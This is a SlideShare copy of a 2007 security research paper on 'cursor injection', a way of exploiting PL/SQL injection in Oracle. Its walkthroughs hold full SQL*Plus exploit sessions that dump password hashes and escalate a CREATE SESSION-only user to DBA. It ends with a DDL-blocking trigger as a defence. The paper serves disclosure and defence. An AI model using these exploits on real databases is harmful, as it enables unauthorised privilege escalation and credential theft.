SlideShare a Scribd company logo

Exploiting PL/SQL Injection Without Privileges

F
fangjiafu

This document describes a new method for exploiting PL/SQL injection without needing to create functions or procedures. It involves injecting a pre-compiled cursor using the DBMS_SQL package to execute arbitrary SQL. The attacker can use this to grant privileges to themselves or create their own functions without any system privileges beyond CREATE SESSION. It provides an example exploiting the SDO_DROP_USER_BEFORE trigger in Oracle to gain DBA privileges in this way without needing CREATE PROCEDURE permission.

Technology
1 of 11
Download to read offline
Cursor Injection - A New Method for Exploiting PL/SQL Injection and Potential Defences David Litchfield [davidl@ngssoftware.com] 24th February 2007 An NGSSoftware Insight Security Research (NISR) Publication ©2007 Next Generation Security Software Ltd http://www.ngssoftware.com
Introduction On occasion Oracle in their alerts state that the ability to create a procedure or a function is required for an attacker to be able to exploit a flaw. For example, DB02 in the October 2006 Critical Patch Update was for a vulnerability in the SDO_DROP_USER_BEFORE trigger. In the Risk Matrix section of the alert it states that an attacker must have the CREATE PROCEDURE privilege to exploit the flaw. As we will see this is not the case. This paper describes a new method whereby an attacker, seeking to exploit a SQL injection flaw in an Oracle database server, may do so without the need to create an auxiliary inject function in order to execute arbitrary SQL. This is achieved by injecting a pre-compiled cursor into vulnerable PL/SQL objects. The driving force behind this research is to show that all SQL injection flaws can be fully exploited without any system privilege other than CREATE SESSION and accordingly the risk should never be "marked down". The problem for the attacker... Consider the following PL/SQL procedure: CONNECT / AS SYSDBA CREATE OR REPLACE PROCEDURE GET_OWNER (P_OBJNM VARCHAR) IS TYPE C_TYPE IS REF CURSOR; CV C_TYPE; BUFFER VARCHAR2(200); BEGIN DBMS_OUTPUT.ENABLE(1000000); OPEN CV FOR 'SELECT OWNER FROM ALL_OBJECTS WHERE OBJECT_NAME = ''' || P_OBJNM ||''''; LOOP FETCH CV INTO BUFFER; DBMS_OUTPUT.PUT_LINE(BUFFER); EXIT WHEN CV%NOTFOUND; END LOOP; CLOSE CV; END; / GRANT EXECUTE ON GET_OWNER TO PUBLIC; It is vulnerable to SQL injection. The P_OBJNM parameter is embedded within a SELECT query which is then executed. Due to the fact that Oracle won't batch queries, for example like Microsoft SQL Server, the attacker is limited in terms of what they could do when it comes to exploiting the flaw. One thing the attacker could do is perform a UNION SELECT to gain access to arbitrary data: SQL> CONNECT SCOTT/PASSWORD Connected. SQL> SET SERVEROUTPUT ON SQL> EXEC SYS.GET_OWNER('AAAA'' UNION SELECT PASSWORD FROM SYS.DBA_USERS -- '); 16B58553D83807DF
1718E5DBB8F89784 24ABAB8B06281B4C ... ... What if they wanted to do more than just this, though, and perform a DDL or DML operation? In Oracle, the attacker could not simply inject a "GRANT DBA TO PUBLIC" or an "INSERT something into some table" statement after the application defined SELECT statement. In order to achieve this, they'd need to wrap their arbitrary SQL in a function and inject this: SQL> CREATE OR REPLACE FUNCTION GET_DBA RETURN VARCHAR AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION; 3 BEGIN 4 EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC'; 5 RETURN 'GOT_DBA_PRIVS'; 6 END; 7 / Function created. SQL> EXEC SYS.GET_OWNER('AAAA''||SCOTT.GET_DBA--'); PL/SQL procedure successfully completed. SQL> SET ROLE DBA; Role set. Here, SCOTT has created a function called GET_DBA and this is then injected into the application defined SELECT query using the concatenation operator - the double pipe. As part of executing the SELECT query the database server also executes the GET_DBA function with SYS privileges and the GRANT succeeds. This GET_DBA function is an auxiliary inject function and it performs the real work of the exploit. If an attacker can't create their own functions then they must find a function that already exists on the system - a function that allows them to execute arbitrary SQL. Prior to April 2006, when the flaw was patched, the GET_DOMAIN_INDEX_TABLES function on the SYS owned DBMS_EXPORT_EXTENSION package could be used: SQL> SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTP UT".PUT(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''GRANT DBA TO PUBLIC''''; END;''; END;-- ','SYS',0,'1',0) This package was vulnerable to SQL injection and attacker supplied arguments were embedded into a block of anonymous PL/SQL. As PUBLIC could directly execute this package they could execute arbitrary SQL using this function alone - there was no need to inject it into another vulnerable package. As already stated, this has since been fixed. There are two other functions that can be used as auxiliary inject functions, however, they
can only be used as such due to a flaw. One is vulnerable to a cursor snarfing issue [see http://www.databasesecurity.com/dbsec/cursor-snarfing.pdf] that can be exploited to run arbitrary SQL as SYS and the other is vulnerable to a SQL injection flaw into an anonymous PL/SQL block, again allowing an attacker to execute arbitrary SQL as SYS. Both are currently being fixed by Oracle and until the patch is out they will remain "nameless". Each of the three known extant functions that can be used as auxiliaries contain a vulnerability of some sort and will all be patched at some stage making their "usefulness" time limited. There is what could be argued as a fourth function that can be abused by an attacker to execute arbitrary SQL and it doesn't rely on a vulnerability. I say "could be argued" because it's not as straight forward as simply injecting the function - it needs to be primed first. What follows is a description of the new method: it is simple multi-stage attack (so simple in fact I should have thought of it years ago!) and it works on all versions of Oracle and can be exploited by an attacker to run any SQL - provided of course there is a vector - i.e. a PL/SQL package, procedure, function, trigger or type which is vulnerable to SQL injection. The DBMS_SQL package The DBMS_SQL package contains a number of procedures and functions that can be used to execute dynamic SQL queries: SQL> CONNECT SCOTT/PASSWORD Connected. SQL> DECLARE 2 MY_CURSOR NUMBER; 3 RESULT NUMBER; 4 BEGIN 5 MY_CURSOR := DBMS_SQL.OPEN_CURSOR; 6 DBMS_SQL.PARSE(MY_CURSOR,'SELECT 1 FROM DUAL',0); 7 RESULT := DBMS_SQL.EXECUTE(MY_CURSOR); 8 DBMS_SQL.CLOSE_CURSOR(MY_CURSOR); 9 END; 10 / PL/SQL procedure successfully completed. Here, we create a cursor called "MY_CURSOR" using the DBMS_SQL.OPEN_CURSOR function. We then tie this cursor to a query, in this case "SELECT 1 FROM DUAL", by using the DBMS_SQL.PARSE procedure. By doing this, the cursor becomes like a handle to this query which is then executed using the DBMS_SQL.EXECUTE function. Lastly the cursor is closed. All an attacker need do to execute arbitrary SQL in open a cursor and parse the SQL and then inject the DBMS_SQL.EXECUTE function into the vulnerable PL/SQL object: SQL> CONNECT SCOTT/PASSWORD Connected. SQL> SET SERVEROUTPUT ON
SQL> DECLARE 2 MY_CURSOR NUMBER; 3 RESULT NUMBER; 4 BEGIN 5 MY_CURSOR := DBMS_SQL.OPEN_CURSOR; 6 DBMS_SQL.PARSE(MY_CURSOR,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to public''; commit; end;',0); 7 DBMS_OUTPUT.PUT_LINE('Cursor value is :' || MY_CURSOR); 8 END; 9 / Cursor value is :4 PL/SQL procedure successfully completed. SQL> EXEC SYS.GET_OWNER('AAAA''||CHR(DBMS_SQL.EXECUTE(4))--'); PL/SQL procedure successfully completed. SQL> SET ROLE DBA; Role set. Firstly, we open the cursor and then parse our query - one that'll grant DBA privileges to PUBLIC. We then print the value of the cursor to the screen - 4 in this case. We then pass 4 as the argument to the DBMS_SQL.EXECUTE function when we inject it into the vulnerable procedure. The DBMS_SQL.EXECUTE function returns a number so we use the CHR function to convert the number to a character - which can then be concatenated. When the application defined SELECT query executes so too does the DBMS_SQL.EXECUTE function - and so the attacker's SQL is executed with SYS privileges - in this case granting DBA privileges to PUBLIC. Only Half-primed... Assume, rather than execute 'GRANT DBA TO PUBLIC', which might alert an intrusion detection/prevention system, the attacker wishes to perform an INSERT to achieve the same end, in other words, INSERT the relevant rows into the SYS.SYSAUTH$ table to make PUBLIC a DBA. At this stage, this new attack technique can not be used to do this. An error is returned from DBMS_SQL: table or view does not exist: SQL> SET SERVEROUTPUT ON SQL> DECLARE 2 MY_CURSOR NUMBER; 3 RESULT NUMBER; 4 BEGIN 5 MY_CURSOR := DBMS_SQL.OPEN_CURSOR; 6 DBMS_SQL.PARSE(MY_CURSOR,'declare pragma autonomous_transaction; begin execute immediate ''INSERT INTO SYS.SYSAUTH$ (GRANTEE#, PRIVILEGE#, SEQUENCE#) VALUES (1,4,(SELECT MAX(SEQUENCE#)+1 FROM SYS.SYSAUTH$))''; commit; end;',0); 7 DBMS_OUTPUT.PUT_LINE('Cursor value is :' || MY_CURSOR); 8 END; 9 / Cursor value is :4
PL/SQL procedure successfully completed. SQL> EXEC SYS.GET_OWNER('AAAA''||CHR(DBMS_SQL.EXECUTE(4))--'); BEGIN SYS.GET_OWNER('AAAA''||CHR(DBMS_SQL.EXECUTE(4))--'); END; * ERROR at line 1: ORA-00942: table or view does not exist ORA-06512: at line 1 ORA-06512: at "SYS.DBMS_SYS_SQL", line 1200 ORA-06512: at "SYS.DBMS_SQL", line 323 ORA-06512: at "SYS.GET_OWNER", line 7 ORA-06512: at line 1 The query here attempts to INSERT into the SYS.SYSAUTH$ table to make PUBLIC a DBA - but as can be seen - an error is generated. Whilst we can't use this to do an INSERT we've already seen we can grant DBA privileges and another action an attacker can take using this method is to create a function - even though they don't have the permissions to do so directly. Let's create a user with only the CREATE SESSION privilege and no more: SQL> CONNECT / AS SYSDBA Connected. SQL> CREATE USER CSESS IDENTIFIED BY PASSWORD; User created. SQL> GRANT CREATE SESSION TO CSESS; Grant succeeded. SQL> CONNECT CSESS/PASSWORD Connected. SQL> SELECT PRIVILEGE FROM SESSION_PRIVS; PRIVILEGE ---------------------------------------- CREATE SESSION SQL> Now with our test user, CSESS, in place let's go ahead, connect as them and create a function even though we only have the CREATE SESSION privilege: SQL> CONNECT CSESS/PASSWORD Connected. SQL> SET SERVEROUTPUT ON SQL> DECLARE 2 MY_CURSOR NUMBER; 3 RESULT NUMBER; 4 BEGIN 5 MY_CURSOR := DBMS_SQL.OPEN_CURSOR; 6 DBMS_SQL.PARSE(MY_CURSOR,'declare pragma autonomous_transaction; begin execute immediate ''create or replace function csess_func (p
varchar2) return number authid current_user is begin execute immediate p; return 1; end;''; commit; end;',0); 7 DBMS_OUTPUT.PUT_LINE('Cursor value is :' || MY_CURSOR); 8 END; 9 / Cursor value is :4 PL/SQL procedure successfully completed. SQL> EXEC SYS.GET_OWNER('AAAA''||CHR(DBMS_SQL.EXECUTE(4))--'); PL/SQL procedure successfully completed. Here we attempt to create a function call CSESS_FUNC. Now see if the function was actually created: SQL> SELECT CSESS_FUNC('SELECT 1 FROM DUAL') FROM DUAL; CSESS_FUNC('SELECT1FROMDUAL') ----------------------------- 1 SQL> All looks good. Now we can use this function to do whatever we want: SQL> CONNECT CSESS/PASSWORD Connected. SQL> SET ROLE DBA; SET ROLE DBA * ERROR at line 1: ORA-01924: role 'DBA' not granted or does not exist SQL> EXEC SYS.GET_OWNER('AAAA''||CHR(CSESS.CSESS_FUNC(''declare pragma autonomous_transaction; begin execute immediate ''''INSERT INTO SYS.SYSAUTH$ (GRANTEE#, PRIVILEGE#, SEQUENCE#) VALUES (1,4,(SELECT MAX(SEQUENCE#)+1 FROM SYS.SYSAUTH$))''''; commit; end;''))--'); PL/SQL procedure successfully completed. SQL> SET ROLE DBA; Role set. Note that, on some systems, such as 10g Release 2 a "unique constraint" error might be generated but the INSERT does succeed: SQL> CONNECT CSESS/PASSWORD Connected. SQL> SET ROLE DBA; SET ROLE DBA * ERROR at line 1: ORA-01924: role 'DBA' not granted or does not exist
SQL> EXEC SYS.GET_OWNER('AAAA''||CHR(CSESS.CSESS_FUNC(''declare pragma autonomous_transaction; begin execute immediate ''''INSERT INTO SYS.SYSAUTH$ (GRANTEE#, PRIVILEGE#, SEQUENCE#) VALUES (1,4,(SELECT MAX(SEQUENCE#)+1 FROM SYS.SYSAUTH$))''''; commit; end;''))--'); BEGIN SYS.GET_OWNER('AAAA''||CHR(CSESS.CSESS_FUNC(''declare pragma autonomous_transaction; begin execute immediate ''''INSERT INTO SYS.SYSAUTH$ (GRANTEE#,PRIVILEGE#, SEQUENCE#) VALUES (1,4,(SELECT MAX(SEQUENCE#)+1 FROM SYS.SYSAUTH$))''''; commit; end;''))--'); END; * ERROR at line 1: ORA-00001: unique constraint (SYS.I_SYSAUTH1) violated ORA-06512: at line 1 ORA-06512: at "CSESS.CSESS_FUNC", line 1 ORA-06512: at "SYS.GET_OWNER", line 7 ORA-06512: at line 1 SQL> SET ROLE DBA; Role set. So, by injecting DBMS_SQL.EXECUTE as an auxiliary function with "limited" scope, an attacker can create their own auxiliary inject function to then do whatever they want. Exploiting the SDO_DROP_USER_BEFORE trigger In the introduction I mentioned the SDO_DROP_USER_BEFORE trigger. In 10g Release 2 and before October 2006, when the flaw was patched, this trigger owned by MDSYS was vulnerable to SQL injection. At the time it was believed that this was only exploitable if the attacker had the CREATE PROCEDURE (and therefore FUNCTION) privilege [see DB02 entry in http://www.oracle.com/technology/deploy/security/critical- patch-updates/cpuoct2006.html#AppendixA] The problem lay in the fact that the name of the user being dropped was embedded within a block of anonymous PL/SQL: ... ... EXECUTE IMMEDIATE 'begin ' || 'mdsys.rdf_apis_internal.' || 'notify_drop_user(''' || dictionary_obj_name || '''); ' || 'end;'; ... ... This is the vulnerable code from the trigger. Here, "dictionary_obj_name" is the name of the user being dropped and, as this "user" could be arbitrary, it was possible for an attacker to inject 30 bytes of arbitrary SQL. In terms of exploiting this to gain DBA privileges an attacker needs to jump through some hoops but it can be done. MDSYS is not a DBA so the attacker must rely on an indirect privilege upgrade attack and, indeed,
an attack is possible via MDSYS having the CREATE ANY TRIGGER system privilege. By leveraging this privilege during a SQL injection attack, the attacker can create an auxiliary trigger in the SYSTEM schema. This auxiliary trigger will carry out the work of gaining the attacker DBA privileges. Firstly, the attacker needs the name of a table into which PUBLIC can insert - there are a few - SYSTEM.OL$ will be the choice. A "BEFORE INSERT" trigger will be created on this table; this trigger will execute the GRANT DBA TO PUBLIC when an INSERT is performed. Let's step through attack from start to finish. CSESS has only the CREATE SESSION privilege and cannot set the DBA role: SQL> CONNECT CSESS/PASSWORD Connected. SQL> SET SERVEROUTPUT ON SQL> SELECT PRIVILEGE FROM SESSION_PRIVS; PRIVILEGE ---------------------------------------- CREATE SESSION SQL> SET ROLE DBA; SET ROLE DBA * ERROR at line 1: ORA-01924: role 'DBA' not granted or does not exist Once logged in CSESS then creates a cursor and primes it with a query that will create the trigger on the SYSTEM.OL$ table - we also use DBMS_OUTPUT to show us that our SQL is executing as expected: SQL> DECLARE 2 MY_CURSOR NUMBER; 3 RESULT NUMBER; 4 BEGIN 5 MY_CURSOR := DBMS_SQL.OPEN_CURSOR; 6 DBMS_SQL.PARSE(MY_CURSOR,'declare pragma autonomous_transaction; begin DBMS_OUTPUT.PUT_LINE(''EXECUTING FROM SDO_DROP_USER_BEFORE!!!''); execute immediate ''create or replace trigger system.WHOPPEE before insert on system.OL$ DECLARE msg VARCHAR2(30); BEGIN null; dbms_output.put_line(''''In the trigger''''); EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''''''GRANT DBA TO PUBLIC''''''''; END; ''''; end WHOPPEE;''; commit; end;',0); 7 DBMS_OUTPUT.PUT_LINE('Cursor value is :' || MY_CURSOR); 8 END; 9 / Cursor value is :3 PL/SQL procedure successfully completed. With this done we can see the value of the cursor is 3. We'll pass this as the argument to DBMS_SQL.EXECUTE when we inject it into the DROP USER statement:
SQL> DROP USER "'||CHR(DBMS_SQL.EXECUTE(3))||'"; EXECUTING FROM SDO_DROP_USER_BEFORE!!! DROP USER "'||CHR(DBMS_SQL.EXECUTE(3))||'" * ERROR at line 1: ORA-01918: user ''||CHR(DBMS_SQL.EXECUTE(3))||'' does not exist Note we see our SQL is executing as expected - we can tell from the "EXECUTING FROM SDO_DROP_USER_BEFORE!!!" message we output using DBMS_OUTPUT.PUT_LINE. By now the WHOPPEE trigger should have been created on the SYSTEM.OL$ table. Let's now do the INSERT to fire the trigger: SQL> INSERT INTO SYSTEM.OL$ (OL_NAME) VALUES ('OWNED!'); In the trigger 1 row created. With the trigger having fired, PUBLIC should now have DBA privileges and we should be able to set the role: SQL> SET ROLE DBA; Role set. And thus the SDO_DROP_USER_BEFORE trigger vulnerability can be exploited by a user that does not have the CREATE PROCEDURE privilege. Risk Mitigation What can be done to help prevent this being used as an attack method? Revoking the PUBLIC execute permission from DBMS_SQL, whilst it is an option, is not advised. There are around 170 objects that depend on DBMS_SQL and revoking the PUBLIC execute permission could invalidate a large number of these dependencies. One useable possibility is to limit who can do what in terms of DDL using a trigger. Assuming the only users on a particular database server that should be executing GRANT, CREATE or ALTER are "SYS", "JIM" and "JANE" then the following trigger could be created: CREATE OR REPLACE TRIGGER PREVENT_DDL BEFORE DDL ON DATABASE DECLARE V_USER VARCHAR(30); BEGIN V_USER := SYS_CONTEXT('USERENV','SESSION_USER'); IF V_USER != 'SYS' AND V_USER != 'JIM' AND V_USER !='JANE' THEN RAISE_APPLICATION_ERROR(-20002,'USER ' || V_USER || ' MAY NOT EXECUTE DDL'); END IF; END; / If we now retry the attack the trigger will prevent us:
SQL> CONNECT CSESS/PASSWORD Connected. SQL> SET SERVEROUTPUT ON SQL> DECLARE 2 MY_CURSOR NUMBER; 3 RESULT NUMBER; 4 BEGIN 5 MY_CURSOR := DBMS_SQL.OPEN_CURSOR; 6 DBMS_SQL.PARSE(MY_CURSOR,'declare pragma autonomous_transaction; begin execute immediate ''create or replace function csess_func (p varchar2) return number authid current_user is begin execute immediate p; return 1; end;''; commit; end;',0); 7 DBMS_OUTPUT.PUT_LINE('Cursor value is :' || MY_CURSOR); 8 END; 9 / Cursor value is :4 PL/SQL procedure successfully completed. SQL> EXEC SYS.GET_OWNER('AAAA''||CHR(DBMS_SQL.EXECUTE(4))--'); BEGIN SYS.GET_OWNER('AAAA''||CHR(DBMS_SQL.EXECUTE(4))--'); END; * ERROR at line 1: ORA-20002: USER CSESS MAY NOT EXECUTE DDL ORA-06512: at line 7 ORA-06512: at line 1 ORA-06512: at "SYS.DBMS_SYS_SQL", line 1200 ORA-06512: at "SYS.DBMS_SQL", line 323 ORA-06512: at "SYS.GET_OWNER", line 7 ORA-06512: at line 1 If we try to disable the trigger we get the same error. If we attempt to grant CSESS the ADMINISTER DATABASE TRIGGER we get the same error. Indeed, any attempt by someone other than SYS, JIM or JANE to execute GRANT, REVOKE, ALTER or CREATE ends up with it being blocked by the trigger. This method appears to be effective as a preventative measure.

Recommended

Bypass dbms assert
Bypass dbms assertBypass dbms assert
Bypass dbms assertfangjiafu
 
#31.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#31.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...#31.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#31.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...탑크리에듀(구로디지털단지역3번출구 2분거리)
 
#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...탑크리에듀(구로디지털단지역3번출구 2분거리)
 
Plsql
PlsqlPlsql
PlsqlNst Tnagar
 
4.Spring IoC&DI(Spring Ioc실습_어노테이션 기반)
4.Spring IoC&DI(Spring Ioc실습_어노테이션 기반)4.Spring IoC&DI(Spring Ioc실습_어노테이션 기반)
4.Spring IoC&DI(Spring Ioc실습_어노테이션 기반)탑크리에듀(구로디지털단지역3번출구 2분거리)
 
[스프링/Spring교육학원,자바교육,근로자교육,실업자교육추천학원_탑크리에듀]#6.스프링프레임워크 & 마이바티스 (Spring Framew...
[스프링/Spring교육학원,자바교육,근로자교육,실업자교육추천학원_탑크리에듀]#6.스프링프레임워크 & 마이바티스 (Spring Framew...[스프링/Spring교육학원,자바교육,근로자교육,실업자교육추천학원_탑크리에듀]#6.스프링프레임워크 & 마이바티스 (Spring Framew...
[스프링/Spring교육학원,자바교육,근로자교육,실업자교육추천학원_탑크리에듀]#6.스프링프레임워크 & 마이바티스 (Spring Framew...탑크리에듀(구로디지털단지역3번출구 2분거리)
 
#18.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_국비지원IT학원/실업자/재직자환급교육/자바/스프링/...
#18.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_국비지원IT학원/실업자/재직자환급교육/자바/스프링/...#18.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_국비지원IT학원/실업자/재직자환급교육/자바/스프링/...
#18.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_국비지원IT학원/실업자/재직자환급교육/자바/스프링/...탑크리에듀(구로디지털단지역3번출구 2분거리)
 
Behavioral pattern 4
Behavioral pattern 4Behavioral pattern 4
Behavioral pattern 4Naga Muruga
 

Recommended

Bypass dbms assert
Bypass dbms assertBypass dbms assert
Bypass dbms assertfangjiafu
 
#31.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#31.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...#31.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#31.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...탑크리에듀(구로디지털단지역3번출구 2분거리)
 
#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#29.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...탑크리에듀(구로디지털단지역3번출구 2분거리)
 
Plsql
PlsqlPlsql
PlsqlNst Tnagar
 
4.Spring IoC&DI(Spring Ioc실습_어노테이션 기반)
4.Spring IoC&DI(Spring Ioc실습_어노테이션 기반)4.Spring IoC&DI(Spring Ioc실습_어노테이션 기반)
4.Spring IoC&DI(Spring Ioc실습_어노테이션 기반)탑크리에듀(구로디지털단지역3번출구 2분거리)
 
[스프링/Spring교육학원,자바교육,근로자교육,실업자교육추천학원_탑크리에듀]#6.스프링프레임워크 & 마이바티스 (Spring Framew...
[스프링/Spring교육학원,자바교육,근로자교육,실업자교육추천학원_탑크리에듀]#6.스프링프레임워크 & 마이바티스 (Spring Framew...[스프링/Spring교육학원,자바교육,근로자교육,실업자교육추천학원_탑크리에듀]#6.스프링프레임워크 & 마이바티스 (Spring Framew...
[스프링/Spring교육학원,자바교육,근로자교육,실업자교육추천학원_탑크리에듀]#6.스프링프레임워크 & 마이바티스 (Spring Framew...탑크리에듀(구로디지털단지역3번출구 2분거리)
 
#18.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_국비지원IT학원/실업자/재직자환급교육/자바/스프링/...
#18.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_국비지원IT학원/실업자/재직자환급교육/자바/스프링/...#18.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_국비지원IT학원/실업자/재직자환급교육/자바/스프링/...
#18.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_국비지원IT학원/실업자/재직자환급교육/자바/스프링/...탑크리에듀(구로디지털단지역3번출구 2분거리)
 
Behavioral pattern 4
Behavioral pattern 4Behavioral pattern 4
Behavioral pattern 4Naga Muruga
 
Demystifying AJAX Callback Commands in Drupal 8
Demystifying AJAX Callback Commands in Drupal 8Demystifying AJAX Callback Commands in Drupal 8
Demystifying AJAX Callback Commands in Drupal 8Michael Miles
 
Identifing Listeners and Filters
Identifing Listeners and FiltersIdentifing Listeners and Filters
Identifing Listeners and FiltersPeople Strategists
 
Chapter09
Chapter09Chapter09
Chapter09sasa_eldoby
 
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...탑크리에듀(구로디지털단지역3번출구 2분거리)
 
Drupal8Day: Demystifying Drupal 8 Ajax Callback commands
Drupal8Day: Demystifying Drupal 8 Ajax Callback commandsDrupal8Day: Demystifying Drupal 8 Ajax Callback commands
Drupal8Day: Demystifying Drupal 8 Ajax Callback commandsMichael Miles
 
New and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthNew and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthowaspindia
 
6.Spring DI_1
6.Spring DI_16.Spring DI_1
6.Spring DI_1탑크리에듀(구로디지털단지역3번출구 2분거리)
 
Spring AOP
Spring AOPSpring AOP
Spring AOPLhouceine OUHAMZA
 
[Www.pkbulk.blogspot.com]dbms07
[Www.pkbulk.blogspot.com]dbms07[Www.pkbulk.blogspot.com]dbms07
[Www.pkbulk.blogspot.com]dbms07AnusAhmad
 
Demystifying Drupal AJAX Callback Commands
Demystifying Drupal AJAX Callback CommandsDemystifying Drupal AJAX Callback Commands
Demystifying Drupal AJAX Callback CommandsMichael Miles
 
(국비지원학원/재직자교육/실업자교육/IT실무교육_탑크리에듀)#4.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)
(국비지원학원/재직자교육/실업자교육/IT실무교육_탑크리에듀)#4.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)(국비지원학원/재직자교육/실업자교육/IT실무교육_탑크리에듀)#4.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)
(국비지원학원/재직자교육/실업자교육/IT실무교육_탑크리에듀)#4.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)탑크리에듀(구로디지털단지역3번출구 2분거리)
 
Function & procedure
Function & procedureFunction & procedure
Function & procedureatishupadhyay
 
04 Handling Exceptions
04 Handling Exceptions04 Handling Exceptions
04 Handling Exceptionsrehaniltifat
 
Testy integracyjne
Testy integracyjneTesty integracyjne
Testy integracyjneŁukasz Zakrzewski
 
PL/SQL TRIGGERS
PL/SQL TRIGGERSPL/SQL TRIGGERS
PL/SQL TRIGGERSLakshman Basnet
 
AutoComplete
AutoCompleteAutoComplete
AutoCompletePatrick Slagle
 
23 ijaprr vol1-3-25-31iqra
23 ijaprr vol1-3-25-31iqra23 ijaprr vol1-3-25-31iqra
23 ijaprr vol1-3-25-31iqraijaprr_editor
 
Sql Functions And Procedures
Sql Functions And ProceduresSql Functions And Procedures
Sql Functions And ProceduresDataminingTools Inc
 
Distributing information on iOS
Distributing information on iOSDistributing information on iOS
Distributing information on iOSMake School
 
MidCamp 2016 - Demystifying AJAX Callback Commands in Drupal 8
MidCamp 2016 - Demystifying AJAX Callback Commands in Drupal 8MidCamp 2016 - Demystifying AJAX Callback Commands in Drupal 8
MidCamp 2016 - Demystifying AJAX Callback Commands in Drupal 8Michael Miles
 
Oss forensics fosscomm_2011
Oss forensics fosscomm_2011Oss forensics fosscomm_2011
Oss forensics fosscomm_2011fangjiafu
 
Wce internals rooted_con2011_ampliasecurity
Wce internals rooted_con2011_ampliasecurityWce internals rooted_con2011_ampliasecurity
Wce internals rooted_con2011_ampliasecurityfangjiafu
 

More Related Content

What's hot

Demystifying AJAX Callback Commands in Drupal 8
Demystifying AJAX Callback Commands in Drupal 8Demystifying AJAX Callback Commands in Drupal 8
Demystifying AJAX Callback Commands in Drupal 8Michael Miles
 
Identifing Listeners and Filters
Identifing Listeners and FiltersIdentifing Listeners and Filters
Identifing Listeners and FiltersPeople Strategists
 
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...탑크리에듀(구로디지털단지역3번출구 2분거리)
 
Drupal8Day: Demystifying Drupal 8 Ajax Callback commands
Drupal8Day: Demystifying Drupal 8 Ajax Callback commandsDrupal8Day: Demystifying Drupal 8 Ajax Callback commands
Drupal8Day: Demystifying Drupal 8 Ajax Callback commandsMichael Miles
 
New and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthNew and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthowaspindia
 
[Www.pkbulk.blogspot.com]dbms07
[Www.pkbulk.blogspot.com]dbms07[Www.pkbulk.blogspot.com]dbms07
[Www.pkbulk.blogspot.com]dbms07AnusAhmad
 
Demystifying Drupal AJAX Callback Commands
